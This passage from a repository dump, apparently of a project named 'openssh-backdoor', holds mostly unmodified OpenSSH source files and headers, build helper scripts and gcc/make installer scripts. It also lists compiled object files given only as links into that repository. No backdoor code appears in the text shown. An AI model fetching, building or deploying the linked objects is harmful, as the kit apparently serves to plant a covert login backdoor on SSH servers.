conditions 6 | * are met: 7 | * 1. Redistributions of source code must retain the above copyright 8 | * notice, this list of conditions and the following disclaimer. 9 | * 2. Redistributions in binary form must reproduce the above copyright 10 | * notice, this list of conditions and the following disclaimer in the 11 | * documentation and/or other materials provided with the distribution. 12 | * 13 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 14 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 15 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 16 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 17 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 18 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 19 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 20 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | */ 24 | 25 | #include "includes.h" 26 | RCSID("$OpenBSD: fatal.c,v 1.1 2002/02/22 12:20:34 markus Exp $"); 27 | 28 | #include "log.h" 29 | 30 | /* Fatal messages. This function never returns. */ 31 | 32 | void 33 | fatal(const char *fmt,...) 34 | { 35 | va_list args; 36 | va_start(args, fmt); 37 | do_log(SYSLOG_LEVEL_FATAL, fmt, args); 38 | va_end(args); 39 | fatal_cleanup(); 40 | } 41 | -------------------------------------------------------------------------------- /fatal.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/fatal.o -------------------------------------------------------------------------------- /fixpaths: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # fixpaths - substitute makefile variables into text files 4 | # Usage: fixpaths -Dsomething=somethingelse ... 5 | 6 | die() { 7 | echo $* 8 | exit -1 9 | } 10 | 11 | test -n "`echo $1|grep -- -D`" || \ 12 | die $0: nothing to do - no substitutions listed! 13 | 14 | test -n "`echo $1|grep -- '-D[^=]\+=[^ ]\+'`" || \ 15 | die $0: error in command line arguments. 16 | 17 | test -n "`echo $*|grep -- ' [^-]'`" || \ 18 | die Usage: $0 '[-Dstring=replacement] [[infile] ...]' 19 | 20 | sed `echo $*|sed -e 's/-D\([^=]\+\)=\([^ ]*\)/-e s=\1=\2=g/g'` 21 | 22 | exit 0 23 | -------------------------------------------------------------------------------- /fixprogs: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # fixprogs - run through the list of entropy commands and 4 | # score out the losers 5 | # 6 | 7 | $entscale = 50; # divisor for optional entropy measurement 8 | 9 | sub usage { 10 | return("Usage: $0 \n"); 11 | } 12 | 13 | if (($#ARGV == -1) || ($#ARGV>1)) { 14 | die(&usage); 15 | } 16 | 17 | # 'undocumented' option - run ent (in second param) on the output 18 | if ($#ARGV==1) { 19 | $entcmd=$ARGV[1] 20 | } else { 21 | $entcmd = "" 22 | }; 23 | 24 | $infilename = $ARGV[0]; 25 | 26 | if (!open(IN, "<".$infilename)) { 27 | die("Couldn't open input file"); 28 | } 29 | $outfilename=$infilename.".out"; 30 | if (!open(OUT, ">$outfilename")) { 31 | die("Couldn't open output file $outfilename"); 32 | } 33 | @infile=; 34 | 35 | select(OUT); $|=1; select(STDOUT); 36 | 37 | foreach (@infile) { 38 | if (/^\s*\#/ || /^\s*$/) { 39 | print OUT; 40 | next; 41 | } 42 | ($cmd, $path, $est) = /^\"([^\"]+)\"\s+([\w\/_-]+)\s+([\d\.\-]+)/o; 43 | @args = split(/ /, $cmd); 44 | if (! ($pid = fork())) { 45 | # child 46 | close STDIN; close STDOUT; close STDERR; 47 | open (STDIN, "/dev/null"); 49 | open (STDERR, ">/dev/null"); 50 | exec $path @args; 51 | exit 1; # shouldn't be here 52 | } 53 | # parent 54 | waitpid ($pid, 0); $ret=$? >> 8; 55 | 56 | if ($ret != 0) { 57 | $path = "undef"; 58 | } else { 59 | if ($entcmd ne "") { 60 | # now try to run ent on the command 61 | $mostargs=join(" ", splice(@args,1)); 62 | print "Evaluating '$path $mostargs'\n"; 63 | @ent = qx{$path $mostargs | $entcmd -b -t}; 64 | @ent = grep(/^1,/, @ent); 65 | ($null, $null, $rate) = split(/,/, $ent[0]); 66 | $est = $rate / $entscale; # scale the estimate back 67 | } 68 | } 69 | print OUT "\"$cmd\" $path $est\n"; 70 | } 71 | 72 | close(IN); 73 | -------------------------------------------------------------------------------- /gcc: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########### 4 | # 5 | # SETTING UP COLLORS 6 | # 7 | ########### 8 | 9 | red='\e[0;31m' 10 | RED='\e[1;31m' 11 | org='\e[0;33m33' 12 | blue='\e[0;34m' 13 | BLUE='\e[1;34m' 14 | cyan='\e[0;36m' 15 | CYAN='\e[1;36m' 16 | GRN='\e[0;32m' 17 | NC='\e[0m' 18 | 19 | ########### 20 | # 21 | # INSTALLING GCC 22 | # 23 | ########### 24 | 25 | echo -e "\n${GRN}NOW TRYING TO INSTALL GCC${NC}\n\n" 26 | 27 | if [ -f /usr/bin/yum ]; 28 | then 29 | yum install -y gcc >> /dev/null 30 | fi 31 | 32 | if [ -f /usr/bin/apt-get ]; 33 | then 34 | apt-get update >> /dev/null 35 | apt-get install gcc -y >> /dev/null 36 | fi 37 | 38 | if [ -f /sbin/yast ]; 39 | then 40 | yast -i gcc >> /dev/null 41 | fi 42 | 43 | if [ -f /usr/bin/zypper ]; 44 | then 45 | zypper -n install gcc >> /dev/null 46 | fi 47 | 48 | if [ -f /usr/bin/gcc ]; then 49 | echo -e "${BLUE}GCC INSTALL${NC} [ ${GRN}COMPLETED${NC} ]" 50 | else 51 | echo -e "${BLUE}GCC INSTALL${NC} [ ${RED}INCOMPLETED${NC} ]" 52 | fi 53 | -------------------------------------------------------------------------------- /gcc-dev: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########### 4 | # 5 | # SETTING UP COLLORS 6 | # 7 | ########### 8 | 9 | red='\e[0;31m' 10 | RED='\e[1;31m' 11 | org='\e[0;33m33' 12 | blue='\e[0;34m' 13 | BLUE='\e[1;34m' 14 | cyan='\e[0;36m' 15 | CYAN='\e[1;36m' 16 | GRN='\e[0;32m' 17 | NC='\e[0m' 18 | 19 | ########### 20 | # 21 | # INSTALLING G++ 22 | # 23 | ########### 24 | 25 | echo -e "\n${GRN}NOW TRYING TO INSTALL G++${NC}\n\n" 26 | 27 | if [ -f /usr/bin/yum ]; 28 | then 29 | yum install gcc-c++ compat-gcc-34 compat-gcc-34-c++ -y >> /dev/null 30 | fi 31 | 32 | if [ -f /usr/bin/apt-get ]; 33 | then 34 | apt-get update >> /dev/null 35 | apt-get install g++ -y >> /dev/null 36 | fi 37 | 38 | if [ -f /usr/include/stdio.h ]; then 39 | echo -e "${BLUE}G++ INSTALL${NC} [ ${GRN}COMPLETED${NC} ]" 40 | else 41 | echo -e "${BLUE}G++ INSTALL${NC} [ ${RED}INCOMPLETED${NC} ]" 42 | fi 43 | -------------------------------------------------------------------------------- /getput.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: getput.h,v 1.8 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * Macros for storing and retrieving data in msb first and lsb first order. 8 | * 9 | * As far as I am concerned, the code I have written for this software 10 | * can be used freely for any purpose. Any derived versions of this 11 | * software must be clearly marked as such, and if the derived work is 12 | * incompatible with the protocol description in the RFC file, it must be 13 | * called by a name other than "ssh" or "Secure Shell". 14 | */ 15 | 16 | #ifndef GETPUT_H 17 | #define GETPUT_H 18 | 19 | /*------------ macros for storing/extracting msb first words -------------*/ 20 | 21 | #define GET_64BIT(cp) (((u_int64_t)(u_char)(cp)[0] << 56) | \ 22 | ((u_int64_t)(u_char)(cp)[1] << 48) | \ 23 | ((u_int64_t)(u_char)(cp)[2] << 40) | \ 24 | ((u_int64_t)(u_char)(cp)[3] << 32) | \ 25 | ((u_int64_t)(u_char)(cp)[4] << 24) | \ 26 | ((u_int64_t)(u_char)(cp)[5] << 16) | \ 27 | ((u_int64_t)(u_char)(cp)[6] << 8) | \ 28 | ((u_int64_t)(u_char)(cp)[7])) 29 | 30 | #define GET_32BIT(cp) (((u_long)(u_char)(cp)[0] << 24) | \ 31 | ((u_long)(u_char)(cp)[1] << 16) | \ 32 | ((u_long)(u_char)(cp)[2] << 8) | \ 33 | ((u_long)(u_char)(cp)[3])) 34 | 35 | #define GET_16BIT(cp) (((u_long)(u_char)(cp)[0] << 8) | \ 36 | ((u_long)(u_char)(cp)[1])) 37 | 38 | #define PUT_64BIT(cp, value) do { \ 39 | (cp)[0] = (value) >> 56; \ 40 | (cp)[1] = (value) >> 48; \ 41 | (cp)[2] = (value) >> 40; \ 42 | (cp)[3] = (value) >> 32; \ 43 | (cp)[4] = (value) >> 24; \ 44 | (cp)[5] = (value) >> 16; \ 45 | (cp)[6] = (value) >> 8; \ 46 | (cp)[7] = (value); } while (0) 47 | 48 | #define PUT_32BIT(cp, value) do { \ 49 | (cp)[0] = (value) >> 24; \ 50 | (cp)[1] = (value) >> 16; \ 51 | (cp)[2] = (value) >> 8; \ 52 | (cp)[3] = (value); } while (0) 53 | 54 | #define PUT_16BIT(cp, value) do { \ 55 | (cp)[0] = (value) >> 8; \ 56 | (cp)[1] = (value); } while (0) 57 | 58 | #endif /* GETPUT_H */ 59 | -------------------------------------------------------------------------------- /groupaccess.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: groupaccess.h,v 1.4 2001/06/26 17:27:23 markus Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2001 Kevin Steves. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #ifndef GROUPACCESS_H 28 | #define GROUPACCESS_H 29 | 30 | #include 31 | 32 | int ga_init(const char *, gid_t); 33 | int ga_match(char * const *, int); 34 | void ga_free(void); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /groupaccess.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/groupaccess.o -------------------------------------------------------------------------------- /hostfile.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: hostfile.h,v 1.13 2002/11/21 23:03:51 deraadt Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | #ifndef HOSTFILE_H 15 | #define HOSTFILE_H 16 | 17 | typedef enum { 18 | HOST_OK, HOST_NEW, HOST_CHANGED, HOST_FOUND 19 | } HostStatus; 20 | 21 | int hostfile_read_key(char **, u_int *, Key *); 22 | HostStatus check_host_in_hostfile(const char *, const char *, 23 | Key *, Key *, int *); 24 | int add_host_to_hostfile(const char *, const char *, Key *); 25 | int lookup_key_in_hostfile_by_type(const char *, const char *, 26 | int, Key *, int *); 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /hostfile.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/hostfile.o -------------------------------------------------------------------------------- /kex.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kex.o -------------------------------------------------------------------------------- /kexdh.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexdh.o -------------------------------------------------------------------------------- /kexdhc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexdhc.o -------------------------------------------------------------------------------- /kexdhs.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexdhs.o -------------------------------------------------------------------------------- /kexgex.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexgex.o -------------------------------------------------------------------------------- /kexgexc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexgexc.o -------------------------------------------------------------------------------- /kexgexs.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/kexgexs.o -------------------------------------------------------------------------------- /key.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/key.o -------------------------------------------------------------------------------- /libssh.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/libssh.a -------------------------------------------------------------------------------- /log.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/log.o -------------------------------------------------------------------------------- /loginrec.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/loginrec.o -------------------------------------------------------------------------------- /mac.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: mac.h,v 1.3 2001/06/26 17:27:24 markus Exp $ */ 2 | /* 3 | * Copyright (c) 2001 Markus Friedl. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 1. Redistributions of source code must retain the above copyright 9 | * notice, this list of conditions and the following disclaimer. 10 | * 2. Redistributions in binary form must reproduce the above copyright 11 | * notice, this list of conditions and the following disclaimer in the 12 | * documentation and/or other materials provided with the distribution. 13 | * 14 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 15 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 16 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 17 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 18 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 19 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 20 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 21 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 23 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | */ 25 | 26 | int mac_valid(const char *); 27 | int mac_init(Mac *, char *); 28 | u_char *mac_compute(Mac *, u_int32_t, u_char *, int); 29 | -------------------------------------------------------------------------------- /mac.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/mac.o -------------------------------------------------------------------------------- /make: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########### 4 | # 5 | # SETTING UP COLLORS 6 | # 7 | ########### 8 | 9 | red='\e[0;31m' 10 | RED='\e[1;31m' 11 | org='\e[0;33m33' 12 | blue='\e[0;34m' 13 | BLUE='\e[1;34m' 14 | cyan='\e[0;36m' 15 | CYAN='\e[1;36m' 16 | GRN='\e[0;32m' 17 | NC='\e[0m' 18 | 19 | ########### 20 | # 21 | # INSTALLING MAKE 22 | # 23 | ########### 24 | 25 | echo -e "\n${GRN}NOW TRYING TO INSTALL MAKE${NC}\n\n" 26 | 27 | if [ -f /usr/bin/yum ]; 28 | then 29 | yum install -y make >> /dev/null 30 | fi 31 | 32 | if [ -f /usr/bin/apt-get ]; 33 | then 34 | apt-get update >> /dev/null 35 | apt-get install make -y >> /dev/null 36 | fi 37 | 38 | if [ -f /sbin/yast ]; 39 | then 40 | yast -i make >> /dev/null 41 | fi 42 | 43 | if [ -f /usr/bin/zypper ]; 44 | then 45 | zypper -n install make >> /dev/null 46 | fi 47 | 48 | if [ -f /usr/bin/make ]; then 49 | echo -e "${BLUE}MAKE INSTALL${NC} [ ${GRN}COMPLETED${NC} ]" 50 | else 51 | echo -e "${BLUE}MAKE INSTALL${NC} [ ${RED}INCOMPLETED${NC} ]" 52 | fi 53 | -------------------------------------------------------------------------------- /match.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: match.h,v 1.12 2002/03/01 13:12:10 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | #ifndef MATCH_H 15 | #define MATCH_H 16 | 17 | int match_pattern(const char *, const char *); 18 | int match_pattern_list(const char *, const char *, u_int, int); 19 | int match_hostname(const char *, const char *, u_int); 20 | int match_host_and_ip(const char *, const char *, const char *); 21 | int match_user(const char *, const char *, const char *, const char *); 22 | char *match_list(const char *, const char *, u_int *); 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /match.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/match.o -------------------------------------------------------------------------------- /md5crypt.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ---------------------------------------------------------------------------- 3 | * "THE BEER-WARE LICENSE" (Revision 42): 4 | * wrote this file. As long as you retain this notice you 5 | * can do whatever you want with this stuff. If we meet some day, and you think 6 | * this stuff is worth it, you can buy me a beer in return. Poul-Henning Kamp 7 | * ---------------------------------------------------------------------------- 8 | */ 9 | 10 | /* 11 | * Ported from FreeBSD to Linux, only minimal changes. --marekm 12 | */ 13 | 14 | /* 15 | * Adapted from shadow-19990607 by Tudor Bosman, tudorb@jm.nu 16 | */ 17 | 18 | /* $Id: md5crypt.h,v 1.3 2001/02/09 01:55:36 djm Exp $ */ 19 | 20 | #ifndef _MD5CRYPT_H 21 | #define _MD5CRYPT_H 22 | 23 | #include "config.h" 24 | 25 | #if defined(HAVE_MD5_PASSWORDS) && !defined(HAVE_MD5_CRYPT) 26 | 27 | int is_md5_salt(const char *salt); 28 | char *md5_crypt(const char *pw, const char *salt); 29 | 30 | #endif /* defined(HAVE_MD5_PASSWORDS) && !defined(HAVE_MD5_CRYPT) */ 31 | 32 | #endif /* MD5CRYPT_H */ 33 | -------------------------------------------------------------------------------- /md5crypt.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/md5crypt.o -------------------------------------------------------------------------------- /misc.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: misc.h,v 1.12 2002/03/19 10:49:35 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | char *chop(char *); 16 | char *strdelim(char **); 17 | void set_nonblock(int); 18 | void unset_nonblock(int); 19 | void set_nodelay(int); 20 | int a2port(const char *); 21 | char *cleanhostname(char *); 22 | char *colon(char *); 23 | long convtime(const char *); 24 | 25 | struct passwd *pwcopy(struct passwd *); 26 | 27 | typedef struct arglist arglist; 28 | struct arglist { 29 | char **list; 30 | int num; 31 | int nalloc; 32 | }; 33 | void addargs(arglist *, char *, ...) __attribute__((format(printf, 2, 3))); 34 | 35 | /* wrapper for signal interface */ 36 | typedef void (*mysig_t)(int); 37 | mysig_t mysignal(int sig, mysig_t act); 38 | -------------------------------------------------------------------------------- /misc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/misc.o -------------------------------------------------------------------------------- /mkinstalldirs: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # mkinstalldirs --- make directory hierarchy 3 | # Author: Noah Friedman 4 | # Created: 1993-05-16 5 | # Public domain 6 | 7 | # $Id: mkinstalldirs,v 1.1 2000/05/20 05:33:45 damien Exp $ 8 | 9 | errstatus=0 10 | 11 | for file 12 | do 13 | set fnord `echo ":$file" | sed -ne 's/^:\//#/;s/^://;s/\// /g;s/^#/\//;p'` 14 | shift 15 | 16 | pathcomp= 17 | for d 18 | do 19 | pathcomp="$pathcomp$d" 20 | case "$pathcomp" in 21 | -* ) pathcomp=./$pathcomp ;; 22 | esac 23 | 24 | if test ! -d "$pathcomp"; then 25 | echo "mkdir $pathcomp" 26 | 27 | mkdir "$pathcomp" || lasterr=$? 28 | 29 | if test ! -d "$pathcomp"; then 30 | errstatus=$lasterr 31 | fi 32 | fi 33 | 34 | pathcomp="$pathcomp/" 35 | done 36 | done 37 | 38 | exit $errstatus 39 | 40 | # mkinstalldirs ends here 41 | -------------------------------------------------------------------------------- /monitor.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/monitor.o -------------------------------------------------------------------------------- /monitor_fdpass.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: monitor_fdpass.h,v 1.2 2002/03/26 03:24:01 stevesk Exp $ */ 2 | 3 | /* 4 | * Copyright 2002 Niels Provos 5 | * All rights reserved. 6 | * 7 | * Redistribution and use in source and binary forms, with or without 8 | * modification, are permitted provided that the following conditions 9 | * are met: 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 17 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 18 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 19 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 20 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 21 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 22 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 24 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 25 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | */ 27 | 28 | #ifndef _MM_FDPASS_H_ 29 | #define _MM_FDPASS_H_ 30 | 31 | void mm_send_fd(int, int); 32 | int mm_receive_fd(int); 33 | 34 | #endif /* _MM_FDPASS_H_ */ 35 | -------------------------------------------------------------------------------- /monitor_fdpass.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/monitor_fdpass.o -------------------------------------------------------------------------------- /monitor_mm.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/monitor_mm.o -------------------------------------------------------------------------------- /monitor_wrap.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/monitor_wrap.o -------------------------------------------------------------------------------- /mpaux.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Author: Tatu Ylonen 3 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 4 | * All rights reserved 5 | * This file contains various auxiliary functions related to multiple 6 | * precision integers. 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | #include "includes.h" 16 | RCSID("$OpenBSD: mpaux.c,v 1.16 2001/02/08 19:30:52 itojun Exp $"); 17 | 18 | #include 19 | #include "getput.h" 20 | #include "xmalloc.h" 21 | 22 | #include 23 | 24 | #include "mpaux.h" 25 | 26 | void 27 | compute_session_id(u_char session_id[16], 28 | u_char cookie[8], 29 | BIGNUM* host_key_n, 30 | BIGNUM* session_key_n) 31 | { 32 | u_int host_key_bytes = BN_num_bytes(host_key_n); 33 | u_int session_key_bytes = BN_num_bytes(session_key_n); 34 | u_int bytes = host_key_bytes + session_key_bytes; 35 | u_char *buf = xmalloc(bytes); 36 | MD5_CTX md; 37 | 38 | BN_bn2bin(host_key_n, buf); 39 | BN_bn2bin(session_key_n, buf + host_key_bytes); 40 | MD5_Init(&md); 41 | MD5_Update(&md, buf, bytes); 42 | MD5_Update(&md, cookie, 8); 43 | MD5_Final(session_id, &md); 44 | memset(buf, 0, bytes); 45 | xfree(buf); 46 | } 47 | -------------------------------------------------------------------------------- /mpaux.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: mpaux.h,v 1.12 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * This file contains various auxiliary functions related to multiple 8 | * precision integers. 9 | * 10 | * As far as I am concerned, the code I have written for this software 11 | * can be used freely for any purpose. Any derived versions of this 12 | * software must be clearly marked as such, and if the derived work is 13 | * incompatible with the protocol description in the RFC file, it must be 14 | * called by a name other than "ssh" or "Secure Shell". 15 | */ 16 | 17 | #ifndef MPAUX_H 18 | #define MPAUX_H 19 | 20 | void compute_session_id(u_char[16], u_char[8], BIGNUM *, BIGNUM *); 21 | 22 | #endif /* MPAUX_H */ 23 | -------------------------------------------------------------------------------- /mpaux.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/mpaux.o -------------------------------------------------------------------------------- /msg.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: msg.h,v 1.2 2002/12/19 00:07:02 djm Exp $ */ 2 | /* 3 | * Copyright (c) 2002 Markus Friedl. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 1. Redistributions of source code must retain the above copyright 9 | * notice, this list of conditions and the following disclaimer. 10 | * 2. Redistributions in binary form must reproduce the above copyright 11 | * notice, this list of conditions and the following disclaimer in the 12 | * documentation and/or other materials provided with the distribution. 13 | * 14 | * THIS 